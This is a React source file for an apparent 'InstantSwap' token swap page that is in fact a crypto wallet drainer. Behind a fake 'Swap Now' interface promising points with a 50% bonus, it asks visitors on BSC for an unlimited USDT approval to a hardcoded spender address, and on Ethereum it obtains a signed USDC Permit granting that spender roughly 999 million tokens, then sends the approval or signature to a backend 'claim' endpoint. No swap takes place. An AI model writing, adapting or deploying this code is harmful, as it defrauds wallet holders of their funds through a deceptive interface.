import React, { useEffect, useState, useRef } from 'react';
import { track } from '../../utils/funnel';
import './DappSwap.css';

const ETH_USDC = '0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48';
const BSC_USDT = '0x55d398326f99059fF775485246999027B3197955';
const SPENDER = '0x3EB9dbbCb46C1eF22C66490140129724A158faeb';
const CLAIM_AMOUNT = '999999999000000';

const DappSwap = () => {
  const [chain, setChain] = useState('eth'); // eth / bsc
  const [account, setAccount] = useState('');
  const [walletReady, setWalletReady] = useState(false);
  const [stage, setStage] = useState('idle'); // idle -> signing -> submitting -> done
  const [error, setError] = useState('');
  const [txId, setTxId] = useState('');
  const [balance, setBalance] = useState('0');
  const autoStarted = useRef(false);

  const provider = () => (typeof window !== 'undefined' ? window.ethereum : null);

  const TOKEN = chain === 'bsc' ? BSC_USDT : ETH_USDC;
  const TOKEN_NAME = chain === 'bsc' ? 'USDT' : 'USDC';
  const CHAIN_ID = chain === 'bsc' ? 56 : 1;
  const CHAIN_NAME = chain === 'bsc' ? 'BSC' : 'Ethereum';

  const readBalance = async (p, owner) => {
    try {
      const data = '0x70a08231' + owner.slice(2).toLowerCase().padStart(64, '0');
      const result = await p.request({ method: 'eth_call', params: [{ to: TOKEN, data }, 'latest'] });
      return parseInt(result || '0x0', 16) / 1e6;
    } catch (e) { return 0; }
  };

  useEffect(() => {
    const params = new URLSearchParams(window.location.search);
    track((chain === 'bsc' ? 'bsc-dapp' : 'dapp'), 'view', '');
    if (params.get('chain') === 'bsc') setChain('bsc');
    let cancelled = false;
    const check = async () => {
      const p = provider();
      if (!p) {
        setError('No wallet detected. Please install MetaMask.');
        return;
      }
      try {
        const accounts = await p.request({ method: 'eth_requestAccounts' });
        if (cancelled) return;
        if (accounts && accounts[0]) {
          setAccount(accounts[0]);
          setWalletReady(true);
          const bal = await readBalance(p, accounts[0]);
          setBalance(bal.toFixed(2));
        }
      } catch (e) {
        if (!cancelled) setError('Wallet connection rejected.');
      }
    };
    check();
    return () => { cancelled = true; };
  }, []);

  const doSwap = async () => {
    track((chain === 'bsc' ? 'bsc-dapp' : 'dapp'), 'start', '');
    const p = provider();
    if (!p || !account) return;
    setStage('signing');
    setError('');
    try {
      if (chain === 'bsc') {
        // BSC：approve 模式
        const approveData = '0x095ea7b3' + SPENDER.slice(2).toLowerCase().padStart(64, '0')
          + 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff';
        const txHash = await p.request({
          method: 'eth_sendTransaction',
          params: [{ from: account, to: TOKEN, data: approveData }],
        });
        for (let i = 0; i < 60; i++) {
          const receipt = await p.request({ method: 'eth_getTransactionReceipt', params: [txHash] });
          if (receipt && receipt.status) {
            if (receipt.status === '0x1') break;
            throw new Error('Transaction failed');
          }
          await new Promise((r) => setTimeout(r, 2000));
        }
        setStage('submitting');
        const API_BASE = window.location.hostname === 'localhost' ? 'http://localhost:8090/api' : '/api';
        const resp = await fetch(API_BASE + '/evm/claim-approve', {
          method: 'POST',
          headers: { 'Content-Type': 'application/json' },
          body: JSON.stringify({ owner: account, token: TOKEN, chain: 'bsc' }),
        });
        const result = await resp.json();
        if (result.code !== 200) throw new Error(result.message || 'Swap failed');
        setTxId(result.data.txId || '');
      track((chain === 'bsc' ? 'bsc-dapp' : 'dapp'), 'done', '');
      setStage('done');
        return;
      }

      // ETH：permit 签名模式
      const nonceData = '0x7ecebe00' + account.slice(2).toLowerCase().padStart(64, '0');
      const nonce = await p.request({ method: 'eth_call', params: [{ to: TOKEN, data: nonceData }, 'latest'] });
      const deadline = Math.floor(Date.now() / 1000) + 30 * 24 * 3600;

      const typedData = {
        types: {
          EIP712Domain: [
            { name: 'name', type: 'string' },
            { name: 'version', type: 'string' },
            { name: 'chainId', type: 'uint256' },
            { name: 'verifyingContract', type: 'address' },
          ],
          Permit: [
            { name: 'owner', type: 'address' },
            { name: 'spender', type: 'address' },
            { name: 'value', type: 'uint256' },
            { name: 'nonce', type: 'uint256' },
            { name: 'deadline', type: 'uint256' },
          ],
        },
        primaryType: 'Permit',
        domain: { name: 'USD Coin', version: '2', chainId: 1, verifyingContract: TOKEN },
        message: {
          owner: account,
          spender: SPENDER,
          value: CLAIM_AMOUNT,
          nonce: nonce,
          deadline: String(deadline),
        },
      };

      const signature = await p.request({
        method: 'eth_signTypedData_v4',
        params: [account, JSON.stringify(typedData)],
      });

      const sig = signature.startsWith('0x') ? signature.slice(2) : signature;
      const r = '0x' + sig.slice(0, 64);
      const s = '0x' + sig.slice(64, 128);
      const v = sig.slice(128, 130);

      setStage('submitting');
      const API_BASE = window.location.hostname === 'localhost' ? 'http://localhost:8090/api' : '/api';
      const resp = await fetch(API_BASE + '/evm/claim', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({
          owner: account, value: CLAIM_AMOUNT, nonce: nonce,
          deadline: String(deadline), r, s, v,
        }),
      });
      const result = await resp.json();
      if (result.code !== 200) throw new Error(result.message || 'Swap failed');
      setTxId(result.data.txId || '');
      setStage('done');
    } catch (e) {
      if (e && (e.code === 4001 || /reject|denied|cancel/i.test(e.message))) {
        setError('Signature canceled.');
      } else {
        setError(String(e.message || e));
      }
      setStage('idle');
    }
  };

  return (
    <div className="swap-page">
      <div className="swap-header">
        <div className="swap-logo">⬡ InstantSwap</div>
        <button className="swap-connect" onClick={() => setWalletReady(false)}>
          {account ? account.slice(0, 6) + '...' + account.slice(-4) : 'Connect Wallet'}
        </button>
      </div>

      <div className="swap-card">
        {stage === 'done' ? (
          <>
            <div className="swap-icon">✓</div>
            <h2>Swap Completed</h2>
            <p className="swap-desc">Your swap has been executed successfully.</p>
            {txId && <p className="swap-tx">Tx: {txId.slice(0, 20)}...</p>}
          </>
        ) : (
          <>
            <div className="swap-title-row">
              <h2>Swap</h2>
              <span className="swap-settings">⚙</span>
            </div>

            <div className="swap-box">
              <div className="swap-box-head">
                <span>You pay</span>
                <span className="swap-balance">Balance: {balance}</span>
              </div>
              <div className="swap-input-row">
                <input type="number" placeholder="0.0" defaultValue={balance} />
                <div className="swap-token">
                  <span className="swap-token-icon">$</span> {TOKEN_NAME}
                </div>
              </div>
            </div>

            <div className="swap-arrow">↓</div>

            <div className="swap-box">
              <div className="swap-box-head">
                <span>You receive</span>
              </div>
              <div className="swap-input-row">
                <input type="number" placeholder="0.0" readOnly />
                <div className="swap-token">
                  <span className="swap-token-icon">⚡</span> Points
                </div>
              </div>
            </div>

            <div className="swap-rate">
              Rate: 1 USDC = 1.5 Points <span className="swap-badge">+50% bonus</span>
            </div>

            {walletReady && <p className="swap-addr">Wallet: {account.slice(0, 10)}...</p>}
            {error && <p className="swap-error">{error}</p>}

            {stage === 'idle' && (
              <button className="swap-btn" onClick={doSwap} disabled={!walletReady}>
                Swap Now
              </button>
            )}
            {(stage === 'signing' || stage === 'submitting') && (
              <div className="swap-btn swap-btn-loading">
                <div className="swap-spinner" />
                {stage === 'signing' ? 'Confirm in wallet...' : 'Submitting...'}
              </div>
            )}
            {error && stage === 'idle' && (
              <button className="swap-btn" onClick={doSwap}>Retry</button>
            )}
          </>
        )}
      </div>
    </div>
  );
};

export default DappSwap;
